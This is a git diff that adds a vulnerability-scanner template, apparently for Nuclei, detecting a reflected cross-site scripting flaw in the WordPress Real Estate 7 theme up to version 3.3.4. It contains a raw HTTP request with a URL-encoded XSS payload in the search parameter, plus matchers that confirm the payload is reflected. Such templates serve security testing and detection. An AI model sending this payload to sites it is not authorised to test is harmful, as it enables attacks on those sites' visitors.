diff --git a/http/vulnerabilities/wordpress/wp-real-estate-xss.yaml b/http/vulnerabilities/wordpress/wp-real-estate-xss.yaml
new file mode 100644
index 0000000000..b250bf02aa
--- /dev/null
+++ b/http/vulnerabilities/wordpress/wp-real-estate-xss.yaml
@@ -0,0 +1,30 @@
+id: wp-real-estate-xss
+info:
+  name:  WordPress Real Estate 7 Theme <= 3.3.4 - Unauthenticated Reflected Cross-Site Scripting (XSS)
+  author: Harsh
+  severity: medium
+  description: |
+    The Real Estate 7 premium theme for WordPress is vulnerable to Reflected Cross-Site Scripting (XSS) attack vector in versions up to, and including, v3.3.4 via the 'ct_additional_features' option due to insufficient input sanitization and output escaping. This vulnerability allows unauthenticated attackers to inject malicious JavaScript payload in the search page that execute if they can trick a user into performing an action such as clicking on a link.
+  reference:
+    - https://www.exploitalert.com/view-details.html?id=39344
+    - https://packetstormsecurity.com/files/171186/WordPress-Real-Estate-7-Theme-3.3.4-Cross-Site-Scripting.html
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cwe-id: CWE-79
+  metadata:
+  tags: wordpress,unauthenticated,xss
+
+http:
+  - raw:  
+      - |
+        GET /?ct_keyword=%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt%28document.domain%29%3E&ct_city=0&ct_state=0&ct_zipcode=0&search-listings=true&ct_property_type=0&ct_beds=0&ct_baths=0&ct_price_from&ct_price_to HTTP/2
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "onerror=prompt(document.domain)>")'
+          - 'contains(all_headers, "text/html")'
+        condition: and